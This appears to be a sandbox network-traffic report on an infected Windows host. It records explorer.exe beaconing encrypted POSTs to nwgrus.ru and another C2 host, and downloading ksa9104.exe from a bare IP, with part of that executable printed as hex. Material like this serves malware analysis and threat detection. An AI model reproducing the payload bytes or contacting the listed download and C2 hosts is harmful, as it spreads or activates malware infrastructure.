Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu:"BtuP",'a+?CGI#73)fS^Oy5uJ_i~'#!eL6B`:l\'HS"Wn8KH%!
Oct 8, 2024 03:16:17.332349062 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:16:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID: 33 | Source IP: 192.168.2.4 | Source Port: 50057 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:16:23.850915909 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pvrcqmbcktsc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 236
Host: nwgrus.ru
Oct 8, 2024 03:16:23.851033926 CEST | 236 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 46 c3 fc
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vubF~PbLhq?SEP"\S4;^ H0!m_CiE"%R-K\nJ_%YvzPF(iw"~`Ux
Oct 8, 2024 03:16:25.215214968 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:16:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID: 34 | Source IP: 192.168.2.4 | Source Port: 50058 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:16:33.780054092 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gvwiwavaujycn.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 306
Host: nwgrus.ru
Oct 8, 2024 03:16:33.780088902 CEST | 306 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 0f b6 86
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu}MF_I ~f3+yfF7byd'pE9TJ-Q,^DA[Z,0ds^#UD{,UYYe0~)KK{
Oct 8, 2024 03:16:35.175225973 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:16:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID: 35 | Source IP: 192.168.2.4 | Source Port: 50059 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:16:46.162148952 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://anqkqcglkprylr.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 347
Host: nwgrus.ru
Oct 8, 2024 03:16:46.162180901 CEST | 347 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 14 d1 a0
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vuedwdKm'V!CbU`CM#&jUR>WUA&+CYm'aYWC?-se;:kHT e!Iu
Oct 8, 2024 03:16:47.542952061 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:16:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID: 36 | Source IP: 192.168.2.4 | Source Port: 50062 | Destination IP: 201.103.8.135 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:17:01.167900085 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lbnjhrckmixdmp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 230
Host: nwgrus.ru
Oct 8, 2024 03:17:01.167931080 CEST | 230 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 24 33 ef a6
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu$3G'MI?PU)/%'M|,nVdz36c%'D<[CWD7`U$182gfnk7[
Oct 8, 2024 03:17:02.271806002 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:17:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID: 37 | Source IP: 192.168.2.4 | Source Port: 50064 | Destination IP: 201.103.8.135 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:17:19.598702908 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jwckdfwbqxcvipv.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 328
Host: nwgrus.ru
Oct 8, 2024 03:17:19.598714113 CEST | 328 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 1b b6 e8
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vuf}zIkqr/M~ajafE'0'8T=$QTg-,!M_5sng[F4(6cxc1rG}>,<s
Oct 8, 2024 03:17:20.703741074 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:17:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID: 38 | Source IP: 192.168.2.4 | Source Port: 50066 | Destination IP: 201.103.8.135 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:17:37.710000992 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qeoeefjxuhhhbrbu.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 331
Host: nwgrus.ru
Oct 8, 2024 03:17:37.710035086 CEST | 331 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 05 f3 ff
Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu=sA|vLjfzy9U"yQ?>xL<ZG\8B>4q[T5^UqQ4NjH%oZzpJ>{u`$b
Oct 8, 2024 03:17:38.839585066 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 01:17:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
39          192.168.2.4  50068        201.103.8.135   80                2580  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Oct 8, 2024 03:17:55.126094103 CEST  283  OUT  POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://xxxghskpkjdphcpk.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 259
    Host: nwgrus.ru
Oct 8, 2024 03:17:55.126184940 CEST  259  OUT  Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2a 2f a4 e3
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu*/6AsXg!~Ufa&r7U)@2Yj+A(g&P.kpEL~Il.XC3Yp%)X~`2Wla.c\l
Oct 8, 2024 03:17:56.256889105 CEST  151  IN  HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:17:56 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49762        23.145.40.164   443               2580  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
2024-10-08 01:14:55 UTC  162  OUT  GET /ksa9104.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: 23.145.40.164
2024-10-08 01:14:55 UTC  327  IN  HTTP/1.1 200 OK
    Date: Tue, 08 Oct 2024 01:14:55 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Last-Modified: Tue, 08 Oct 2024 01:00:02 GMT
    ETag: "6ec00-623eca8482fba"
    Accept-Ranges: bytes
    Content-Length: 453632
    Connection: close
    Content-Type: application/x-msdos-program
2024-10-08 01:14:55 UTC  7865  IN  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fb 69 6f f7 bf 08 01 a4 bf 08 01 a4 bf 08 01 a4 d0 7e 9f a4 a7 08 01 a4 d0 7e aa a4 98 08 01 a4 d0 7e ab a4 d3 08 01 a4 b6 70 92 a4 b4 08 01 a4 bf 08 00 a4 33 08 01 a4 d0 7e ae a4 be 08 01 a4 d0 7e 9b a4 be 08 01 a4 d0 7e 9c a4 be 08 01 a4 52 69 63 68 bf 08 01 a4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c0 24 02 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 d6 00
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$io~~~p3~~~RichPEL$e
2024-10-08 01:14:55 UTC  8000  IN  Data Raw: 95 c0 2a 40 00 8b ff d0 2a 40 00 d8 2a 40 00 e4 2a 40 00 f8 2a 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 5c 2c 40 00 8b ff f7 d9 ff 24 8d 0c 2c 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 60 2b 40 00 ff 24 8d 5c 2c 40 00 90 70 2b 40 00 94 2b 40 00 bc 2b 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 5c 2c 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 5c
    Data Ascii: *@*@*@*@*@E^_E^_FGE^_IFGFGE^_t1|9u$r$\,@$,@Ir+$`+@$\,@p+@+@+@F#Gr$\,@IF#GFGr$\
2024-10-08 01:14:55 UTC  8000  IN  Data Raw: 8d 38 fd ff ff 02 e8 53 43 00 00 e8 03 00 00 00 5b c9 c3 80 a5 38 fd ff ff fe 83 3d f0 1d 45 00 00 75 4f dd 95 30 fd ff ff 8a 85 70 ff ff ff 0a c0 74 1a 3c ff 74 5b 3c fe 74 3f 0a c0 74 33 0f be c0 89 85 72 ff ff ff e9 b2 00 00 00 66 8b 85 5c ff ff ff 66 83 e0 20 75 18 9b df e0 66 83 e0 20 74 0f c7 85 72 ff ff ff 08 00 00 00 e9 8d 00 00 00 d9 ad 5c ff ff ff 9b c3 66 8b 85 36 fd ff ff 66 25 f0 7f 66 0b c0 74 1b 66 3d f0 7f 74 43 eb bb 66 8b 85 36 fd ff ff 66 25 f0 7f 66 3d f0 7f 74 30 eb a8 c7 85 72 ff ff ff 04 00 00 00 dd 05 18 fd 40 00 d9 c9 d9 fd dd d9 d9 c0 d9 e1 dc 1d 08 fd 40 00 9b df e0 9e 73 34 dc 0d 28 fd 40 00 eb 2c c7 85 72 ff ff ff 03 00 00 00 dd 05 10 fd 40 00 d9 c9 d9 fd dd d9 d9 c0 d9 e1 dc 1d 00 fd 40 00 9b df e0 9e 76 06 dc 0d 20 fd 40 00
    Data Ascii: 8SC[8=EuO0pt<t[<t?t3rf\f uf tr\f6f%ftf=tCf6f%f=t0r@@s4(@,r@@v @
2024-10-08 01:14:55 UTC  8000  IN  Data Raw: 66 83 f9 09 75 bc 85 f6 74 06 33 c9 66 89 4e fe 83 65 fc 00 33 d2 66 39 10 0f 84 c5 00 00 00 0f b7 08 83 f9 20 74 05 83 f9 09 75 0a 83 c0 02 eb ee 83 e8 02 eb da 66 39 10 0f 84 a5 00 00 00 39 55 08 74 09 8b 4d 08 83 45 08 04 89 31 ff 07 33 ff 47 33 d2 eb 04 83 c0 02 42 66 83 38 5c 74 f6 66 83 38 22 75 38 f6 c2 01 75 1f 83 7d fc 00 74 0c 66 83 78 02 22 75 05 83 c0 02 eb 0d 33 c9 33 ff 39 4d fc 0f 94 c1 89 4d fc d1 ea eb 10 4a 85 f6 74 09 6a 5c 59 66 89 0e 83 c6 02 ff 03 85 d2 75 ec 0f b7 08 66 85 c9 74 24 39 55 fc 75 0a 83 f9 20 74 1a 83 f9 09 74 15 85 ff 74 0c 85 f6 74 06 66 89 0e 83 c6 02 ff 03 83 c0 02 eb 81 85 f6 74 08 33 c9 66 89 0e 83 c6 02 ff 03 8b 7d 0c e9 30 ff ff ff 8b 45 08 3b c2 74 02 89 10 ff 07 5f 5e c9 c3 8b ff 55 8b ec 51 51 53 56 57 68 04
    Data Ascii: fut3fNe3f9 tuf99UtME13G3Bf8\tf8"u8u}tfx"u339MMJtj\Yfuft$9Uu ttttft3f}0E;t_^UQQSVWh
2024-10-08 01:14:55 UTC  8000  IN  Data Raw: 45 e4 3d 01 01 00 00 7d 0d 8a 4c 18 1c 88 88 18 bd 44 00 40 eb e9 33 c0 89 45 e4 3d 00 01 00 00 7d 10 8a 8c 18 1d 01 00 00 88 88 20 be 44 00 40 eb e6 ff 35 20 bf 44 00 ff 15 1c f0 40 00 85 c0 75 13 a1 20 bf 44 00 3d f8 ba 44 00 74 07 50 e8 d4 a8 ff ff 59 89 1d 20 bf 44 00 53 ff d7 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 30 6a 0d e8 2d d3 ff ff 59 c3 eb 25 83 f8 ff 75 20 81 fb f8 ba 44 00 74 07 53 e8 9e a8 ff ff 59 e8 9c c4 ff ff c7 00 16 00 00 00 eb 04 83 65 e0 00 8b 45 e0 e8 78 cf ff ff c3 83 3d b8 cc 45 00 00 75 12 6a fd e8 56 fe ff ff 59 c7 05 b8 cc 45 00 01 00 00 00 33 c0 c3 cc cc cc cc 55 8b ec 56 33 c0 50 50 50 50 50 50 50 50 8b 55 0c 8d 49 00 8a 02 0a c0 74 09 83 c2 01 0f ab 04 24 eb f1 8b 75 08 83 c9 ff 8d 49 00 83 c1 01 8a 06 0a c0 74 09 83 c6 01
    Data Ascii: E=}LD@3E=} D@5 D@u D=DtPY DSE0j-Y%u DtSYeEx=EujVYE3UV3PPPPPPPPUIt$uIt
2024-10-08 01:14:56 UTC  8000  IN  Data Raw: 33 ff 89 78 04 8b 45 08 33 db 89 78 08 8b 45 08 43 89 78 0c f6 c1 10 74 0d 8b 45 08 09 58 04 c7 45 10 8f 00 00 c0 f6 c1 02 74 0e 8b 45 08 83 48 04 02 c7 45 10 93 00 00 c0 84 cb 74 0e 8b 45 08 83 48 04 04 c7 45 10 91 00 00 c0 f6 c1 04 74 0e 8b 45 08 83 48 04 08 c7 45 10 8e 00 00 c0 f6 c1 08 74 0e 8b 45 08 83 48 04 10 c7 45 10 90 00 00 c0 8b 75 0c 8b 0e 8b 45 08 c1 e1 04 f7 d1 33 48 08 83 e1 10 31 48 08 8b 0e 8b 45 08 03 c9 f7 d1 33 48 08 83 e1 08 31 48 08 8b 0e 8b 45 08 d1 e9 f7 d1 33 48 08 83 e1 04 31 48 08 8b 0e 8b 45 08 c1 e9 03 f7 d1 33 48 08 83 e1 02 31 48 08 8b 0e 8b 45 08 c1 e9 05 f7 d1 33 48 08 23 cb 31 48 08 e8 30 04 00 00 84 c3 74 07 8b 4d 08 83 49 0c 10 a8 04 74 07 8b 4d 08 83 49 0c 08 a8 08 74 07 8b 4d 08 83 49 0c 04 a8 10 74 07 8b 4d 08 83 49
    Data Ascii: 3xE3xECxtEXEtEHEtEHEtEHEtEHEuE3H1HE3H1HE3H1HE3H1HE3H#1H0tMItMItMItMI
2024-10-08 01:14:56 UTC  8000  IN  Data Raw: 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 f0 eb 05 83 64 95 f0 00 83 e9 04 4a 79 e9 8b 1d 8c c1 44 00 03 1d 78 c1 44 00 33 c0 40 e9 98 00 00 00 03 1d 8c c1 44 00 81 65 f0 ff ff ff 7f 8b c1 99 83 e2 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 42 83 65 d8 00 83 65 e0 00 83 ce ff 8b ca d3 e6 c7 45 dc 20 00 00 00 29 55 dc f7 d6 8b 4d e0 8b 7c 8d f0 8b cf 23 ce 89 4d d4 8b ca d3 ef 8b 4d e0 0b 7d d8 89 7c 8d f0 8b 7d d4 8b 4d dc d3 e7 ff 45 e0 83 7d e0 03 89 7d d8 7c d0 8b f0 6a 02 c1 e6 02 8d 4d f8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 f0 eb 05 83 64 95 f0 00 83 e9 04 4a 79 e9 33 c0 5e 6a 1f 59 2b 0d 84 c1 44 00 d3 e3 8b 4d c8 f7 d9 1b c9 81 e1 00 00 00 80 0b d9 8b 0d 88 c1 44 00 0b 5d f0 83 f9 40 75 0d 8b 4d cc 8b 55 f4 89 59 04 89 11 eb 0a 83 f9 20
    Data Ascii: Z+;|1tdJyDxD3@DeyJBeeE )UM|#MM}|}ME}}|jMZ+;|1tdJy3^jY+DMD]@uMUY
2024-10-08 01:14:56 UTC  8000  IN  Data Raw: 9d 04 00 da 9d 04 00 e8 9d 04 00 fc 9d 04 00 0a 9e 04 00 1c 9e 04 00 2a 9e 04 00 42 9e 04 00 56 9e 04 00 66 9e 04 00 72 9e 04 00 7c 9e 04 00 90 9e 04 00 a8 9e 04 00 b8 9e 04 00 ce 9e 04 00 e0 9e 04 00 f6 9e 04 00 06 9f 04 00 20 9f 04 00 34 9f 04 00 20 9d 04 00 5e 9f 04 00 74 9f 04 00 84 9f 04 00 9e 9f 04 00 ae 9f 04 00 c6 9f 04 00 d8 9f 04 00 f0 9f 04 00 04 a0 04 00 1a a0 04 00 28 a0 04 00 38 a0 04 00 46 a0 04 00 58 a0 04 00 6c a0 04 00 7c a0 04 00 8a a0 04 00 98 a0 04 00 a6 a0 04 00 ba a0 04 00 ce a0 04 00 e4 a0 04 00 f8 a0 04 00 0e a1 04 00 1c a1 04 00 2c a1 04 00 a4 9c 04 00 08 9d 04 00 f4 9c 04 00 dc 9c 04 00 ca 9c 04 00 b8 9c 04 00 48 9f 04 00 a4 a5 04 00 96 a5 04 00 82 a5 04 00 70 a5 04 00 60 a5 04 00 00 a2 04 00 10 a2 04 00 20 a2 04 00 28 a2 04 00
    Data Ascii: *BVfr| 4 ^t(8FXl|,Hp` (
2024-10-08 01:14:56 UTC  8000  IN  Data Raw: 61 74 69 63 20 74 68 72 65 61 64 20 67 75 61 72 64 27 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 64 79 6e 61 6d 69 63 20 61 74 65 78 69 74 20 64 65 73 74 72 75 63 74 6f 72 20 66 6f 72 20 27 00 00 00 00 60 64 79 6e 61 6d 69 63 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20
    Data Ascii: atic thread guard'`managed vector copy constructor iterator'`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh
2024-10-08 01:14:56 UTC  8000  IN  Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii:


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49915        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
2024-10-08 01:15:19 UTC  284  OUT  POST /search.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: https://emovkvrsbdl.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 234
    Host: ninjahallnews.com
2024-10-08 01:15:19 UTC  234  OUT  Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 32 c2 19 9b a7 f2 23 03 cc 75 6a 83 5b e5 cb 34 65 cf 30 2c 78 ca da d1 68 ab ce 6e 51 f3 f0 61 a9 29 74 be 8b 05 64 4c 46 00 46 fb 10 d7 f4 9d 53 e5 e2 6b 64 24 e2 5c 2f ba 72 48 cc fb f2 c8 24 13 b5 0b da 45 8d 71 37 bd 55 8d 61 28 51 33 62 c1 bc 5f 93 89 04 e9 2a 65 c6 b6 de 3b be 9d 06 e6 d3 bf 9a 3d 64 c6 96 86 0a 3b b6 5c 55 fc 35 0c 00 f2 6a 67 6e f8 38 39 23 96 cc 8b 7b 5e b8 ef 66 fb 64 83 b7 db 66 08 01 37 df 65 3f 1f 0d 68 a7 23 9f ad 2b 38 01 50 1c b2
    Data Ascii: rmh9/2p6 )6IP g3iqH[CLj4%<2#uj[4e0,xhnQa)tdLFFSkd$\/rH$Eq7Ua(Q3b_*e;=d;\U5jgn89#{^fdf7e?h#+8P
2024-10-08 01:15:19 UTC  294  IN  HTTP/1.1 404 Not Found
    Date: Tue, 08 Oct 2024 01:15:19 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Type: text/html; charset=utf-8
    Connection: close
    Transfer-Encoding: chunked
2024-10-08 01:15:19 UTC  7898  IN  Data Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 55 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
    Data Ascii: 1ee6U[!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
2024-10-08 01:15:19 UTC  18  IN  Data Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c
    Data Ascii: JMQF 82
2024-10-08 01:15:19 UTC  2  IN  Data Raw: 0d 0a
    Data Ascii:
